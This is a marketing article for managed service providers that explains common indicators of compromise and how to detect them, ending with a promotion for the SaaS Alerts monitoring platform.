To effectively protect their clients from escalating cyber threats, MSPs need a deep understanding of tactical threat intelligence. Enter indicators of compromise (IOCs). 
IOCs are critical pieces of information that help MSPs identify whether a system or network has been infiltrated by malicious actors. Using these digital breadcrumbs, MSPs can uncover cyberattacks. This article will explore what IOCs are and which indicators MSPs should watch out for.
What Is an IOC?
An indicator of compromise (IOC) is a marker within digital data that indicates when a hacker breaches a system or network. These evidences raise security alerts about any suspicious activity or potential threat.
Monitoring for IOCs is akin to having a vigilant digital security guard. When these indicators are spotted, IT security professionals can limit damages by swiftly stopping attacks in the earliest stages.
Common indicators of compromise examples
The six common types of IOCs in cybersecurity that MSPs should detect and investigate are:
1. Malware Signatures
MSPs can quickly identify if a client’s system has been infected by actively tracking malware signatures
Malware leaves behind specific signatures or patterns in files and code. These can be known patterns of malicious software behavior or unique file hashes.
MSPs can quickly identify if a client’s system has been infected by actively tracking malware signatures. Early detection allows them to isolate and remove the malware before it causes substantial damage.
2. Suspicious Network Traffic
Any unusual data flow or communication on a network can indicate a potential security threat. Suspicious traffic could include port scanning, unusual DNS requests, or sudden spikes in data transmissions.
MSPs should monitor these anomalies to promptly respond to suspicious inbound and outbound network traffic and prevent unauthorised access or data exfiltration.
3. Unusual User Account Activity
Anomalies in user accounts might include repeated failed login attempts, unauthorised access to sensitive files, or sudden changes in user privileges.
If an account is compromised or shows signs of malicious activity, MSPs can take immediate action to isolate it. These actions typically involve logging out of the user, changing passwords, and deactivating the account.
4. Unexpected Geographical Anomalies
If a user account or a device logs in from an unusual location, it can suggest unauthorised access
If a user account or a device logs in from an unusual location, it can suggest unauthorised access or a compromised account. Attackers often use VPNs or proxies to hide their actual geographic location.
For example, if a user usually logs in from New York but suddenly there’s an unauthorised login from Japan, that might indicate an unexpected geographical anomaly. In certain situations, however, such as vacations or business trips, the user may legitimately log in from a different location. By considering this context, MSPs can make more informed decisions about whether a geographical anomaly is indicative of a security threat or simply reflects the user’s legitimate activities.
5. Suspicious Registry Changes
For Windows users, the Windows Registry is a hierarchy-based database that Microsoft OS uses to store configuration settings for both the OS and installed applications. Alternatively, in macOS, system and application settings are stored in configuration files and directories.
When malware infects a system, it often changes the registry to establish control and modify system settings. MSPs can identify these alterations as suspicious registry changes and take action to remove the threat.
6. HTML Response Sizes
HTML response sizes refer to the data volume a web server sends to a client’s web browser in response to an HTTP request. These responses include the HTML content, images, stylesheets, scripts, and other elements of a web page.
When attackers successfully infiltrate a system, they use the webserver to send and store sensitive data back to their command-and-control server. Monitoring HTML response sizes can help detect this unauthorised data transfer.
Why MSPs Should Monitor for Indicators of Compromise
Monitoring for indicators of compromise is essential for these six reasons:
1) Proactive defense: IOC monitoring allows MSPs to approach security proactively. Rather than merely reacting to breaches after the fact, MSPs can actively detect signs of compromise and address vulnerabilities before their exploitation.
2) Client data protection: MSPs are responsible for safeguarding their clients’ sensitive information. Monitoring IOCs helps ensure the confidentiality and integrity of this data, preventing unauthorised access, exfiltration, or tampering.
3) Ransomware protection: Cybercriminals have become 94% quicker in executing ransomware attacks — from 60+ days in 2019 to just 3.85 days in 2021, per IBM. To deal with this growing speed of attacks, ransomware indicators of compromise play a vital role in response and mitigation efforts. They help security teams isolate compromised systems, remove ransomware, and recover encrypted data from backups.
- Cost reduction: Dealing with security incidents after they occur can be expensive and time-consuming. A report by Osterman found that organisations pay $1,197 per employee yearly to address cyber incidents across email services, cloud collaboration apps or services, and web browsers. By preventing or detecting incidents early, MSPs reduce the costs associated with incident response and recovery.
- Client education: MSPs can use insights from IOC monitoring to educate clients about emerging threats and best practices for security. This knowledge-sharing strengthens the client-MSP relationship and empowers clients to become more vigilant about their security.
- Enhanced incident response: A well-established IOC monitoring process significantly improves the speed and effectiveness of incident response, reducing downtime and potential damage.
How to identify indicators of compromise
Identifying IOCs through threat intelligence is valuable to enhance cybersecurity. Effective attack intelligence involves gathering and analysing data about potential threats and vulnerabilities.
Here’s how users can effectively identify IOCs:
Collect and Analyse Data
Aggregate and consolidate the collected data into a central repository or threat intelligence platform
Start by collecting data from various sources, such as open-source threat feeds, commercial threat intelligence providers, government agencies, internal logs, and community forums related to cybersecurity.
Aggregate and consolidate the collected data into a central repository or threat intelligence platform, which should be capable of analysing the data to identify patterns and potential IOCs. Users can use automated tools and algorithms to sift through large datasets.
Look for IOCs
Pay attention to unusual or abnormal patterns in the data, such as:
- IP addresses
- Geolocation
- File activity
- External email addresses
- Devices used to sign in to accounts
- Policy changes
Correlate and Contextualise
Prioritise the identified IOCs based on relevance and severity. Not all IOCs are equally important; some may generate false positives, leading to alert fatigue. Users should also correlate different IOCs to understand a more comprehensive picture of potential threats and attacks.
By contextualising the IOCs, the user can assess the threat actor’s tactics, techniques, and procedures (TTPs) and the potential impact on the user organisation.
Customise Alerts and Rules
Users can configure user systems to block traffic or isolate compromised systems upon finding relevant IOCs
Set up alerts and rules within user security systems, such as intrusion detection systems (IDS), to automatically trigger responses when specific IOCs are detected.
Users can configure user systems to block traffic or isolate compromised systems upon finding relevant IOCs.
Respond to Threats
When the user detects relevant IOCs, initiate an incident response plan to mitigate the threat. This plan should include:
- Isolating compromised systems and accounts
- Removing malware
- Patching vulnerabilities
Share Threat Data and Feedback
Users should continually use the lessons from security incidents to improve their security posture
Share IOCs and threat intelligence with other organisations and industry-specific Information Sharing and Analysis Centers (ISACs). Collaborative sharing of threat data allows organisations to cross-reference and validate information about security events, improving the accuracy and reliability of threat intelligence.
Users should continually use the lessons from security incidents to improve their security posture. Adjust user policies, procedures, and defenses based on the insights gained from IOCs.
Detect IOCs efficiently with SaaS Alerts
The automation capabilities of SaaS Alerts help MSPs streamline IOC detection efforts, proactively safeguard digital assets, and respond swiftly to potential threats.
Having an automated process to collect data and respond to IOCs enables faster remediation. With the platform, MSPs can leverage the following features:
- Continuous monitoring: Get rapid notifications of unusual activities within the userr network or systems.
- Threat intelligence integration: Stay informed about the latest threats and vulnerabilities, ensuring user’re well-prepared to face evolving challenges.
- Automated response: Set up automatic responses to mitigate threats, reduce response time, and minimise potential damage.
- Comprehensive reporting: Monitor a wide range of IOCs, including application traffic, user activity, and file metadata.